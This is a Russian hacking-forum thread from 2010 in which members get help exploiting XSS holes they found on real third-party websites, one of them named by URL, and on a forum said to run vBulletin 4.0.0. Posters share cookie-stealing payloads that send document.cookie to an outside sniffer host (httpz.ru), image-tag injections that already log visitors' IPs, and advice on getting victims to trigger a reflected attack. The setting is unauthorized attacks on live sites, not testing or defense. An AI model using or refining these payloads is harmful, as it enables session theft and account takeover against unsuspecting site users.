 |
|

30.09.2010, 01:00
|
|
Новичок
Регистрация: 01.08.2009
Сообщений: 12
С нами:
8830468
Репутация:
0
|
|
Предлагаю сделать небольшую объединяющую тему для разбора реальных уязвимостей, будь sqli, xss, инклуды и т.п.
Если выкладываете ссылку на сайт, делайте хайд, чтобы она не индексировалась. Ну и максимально полное описание проблемы + четко сформулированный вопрос. Перед тем, как задать вопрос, прошу пользоваться гуглом и поиском по форуму, чтобы не спрашивать дважды, а то и трижды одно и то же.
|
|
|

09.10.2010, 01:00
|
|
Постоянный
Регистрация: 03.04.2009
Сообщений: 354
С нами:
9003926
Репутация:
110
|
|
Вобщем проблемма такая) Нашел уязвимость на рандомном сайте
Скрытый текст (вы должны быть авторизованы и иметь 5 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь
alert('') выполняется при вводе
code:
'>">alert(/XSS/)
в строку поиска или в адресную строку.
Но на этом всё и закончилось, ибо как я не пытался вбить туда скрипт под HPС Снифф, он не выполняется..
Сообственно тело скрипта
code:
">
img = new Image(); img.src = "Адресс снифа"+document.cookie;
Вполне вероятно, что у меня просто неправильное представление о выполнее XSS кода.. Если это так и есть, то ткните, где именно я туплю) буду очень благодарен =)
p.s. сайт не имеет пользовательской авторизации. Но IP и тип браузера на снифф отсылаться-то вроде должны?..
|
|
|

09.10.2010, 01:00
|
|
Новичок
Регистрация: 01.08.2009
Сообщений: 12
С нами:
8830468
Репутация:
0
|
|
Срабатывает так:
Скрытый текст (вы должны быть авторизованы и иметь 5 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь
Используй код для пассивной атаки из настроек нашего снифера
|
|
|

09.10.2010, 01:00
|
|
Постоянный
Регистрация: 03.04.2009
Сообщений: 354
С нами:
9003926
Репутация:
110
|
|
stan_q, да, так прокатило =) спасибо большое))
тогда по теме еще один вопрос, возможно ли запускать этот скрипт через результат поиска по сайту (если XSS в поисковике, а адресная строка без уязвимостей)
Я так понимаю, если alert прокатывает, значит сайт пропускает . А если сайт пропускает скрипт, то можно вбить его в поисковик и в обновлённой странице в исходном коде будет целый и невредимый скрипт.. Тоесть при заходе юзера на ссылку с результатом поиска, при загрузке страницы этот скрипт будет выполняться. Я правильно понимаю?)
|
|
|

09.10.2010, 01:00
|
|
Новичок
Регистрация: 01.08.2009
Сообщений: 12
С нами:
8830468
Репутация:
0
|
|
Да, если alert срабатывает, то скрипт не фильтрует вводимые данные. Но если запрос передается через POST-запрос, то для эксплуатации надо будет применять разные методы, чтобы заставить жертву выполнить нужный тебе запрос. Т.е. чтобы жертва сама ввела в поиск вредноносный код и нажала энтер для его выполнения. Поправьте меня, если я ошибаюсь.
[offtop] Мой 1000-й пост [/offtop]
|
|
|

09.10.2010, 01:00
|
|
Постоянный
Регистрация: 03.04.2009
Сообщений: 354
С нами:
9003926
Репутация:
110
|
|
stan_q, Post запросы, вроде как, идут только на ресурсах с коментариями и заливкой файлов. И то, только в части сайта.. Другая часть сайта работает по обычному принципу
Если фильтр изменяет символы
code:
"
, еще есть шанс замутить активную XSS или только пасивную?
В разных частях сайта запросы выполняются по разному или везде один фильтр? тоесть если на всех страницах сайта Alert не канает, возможно ли существование такого отдела сайта, где скрипт запустится? или фильтр работает по всему сайту?
p.s. Гц с юбилейным постом =)
|
|
|

13.10.2010, 01:00
|
|
Постоянный
Регистрация: 03.04.2009
Сообщений: 354
С нами:
9003926
Репутация:
110
|
|
Столкнулся с такой проблеммой:
На одном форуме нашел возможность добавление
code:
[JPG][/JPG]
Добавил картинку со сниффера - прокатило, и он даже IP пользователей ловит =)
Дальше пробовал поставить Пробел после ссылки на картинку и опять всё отлично =)
Но при попытке вставить Java код, а точнее
code:
http://httpz.ru/картинка dynsrc=javascript:document.write('img = new Image(); img.src = "http://httpz.ru/сниффер?"+document.cookie;')
картинка убивается и на её месте пустое место.
Собственно вопрос - Если такая фигня, активная XSS еще возможно? или полностью отпадает?
p.s Пробовал lowsrc и перестановку Java скрипта.. Картинка всё так же не читается)
p.s.s. Вот всё, что известно мне о сайте.
1)Форум стоит на булке v4.0.0
2)Фильтратор изменяет такие символы, как и "
3)Перевод скриптов в Hex и Юник делают скрипт нечитаемым (хотя он остаётся целым)
Что можно еще попробовать сделать с скриптом?) Интересны все предложения =)
|
|
|

15.10.2010, 01:00
|
|
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами:
8903558
Репутация:
60
|
|
Цитата:
Что можно еще попробовать сделать с скриптом?
HTML highlight
Код:
/1.jpg)
где http://www.qweqw.ru/1.jpg - адрес отображаемой картинки
|
|
|

15.10.2010, 01:00
|
|
Постоянный
Регистрация: 03.04.2009
Сообщений: 354
С нами:
9003926
Репутация:
110
|
|
M@ZAX@KEP, не прокатило.. картинка не запустилась ни в одном случае)
|
|
|

16.10.2010, 01:00
|
|
Новичок
Регистрация: 01.08.2009
Сообщений: 12
С нами:
8830468
Репутация:
0
|
|
Нет там инъекции, там изначально скрипт написан с ошибкой, о чем нам и сообщают при даже стандартном запросе http://teploe-okno.ru/page.php?pid=1
Вторая ошибка дает тебе только раскрытие путей, использовать ее для взлома другим способом возможности нет.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|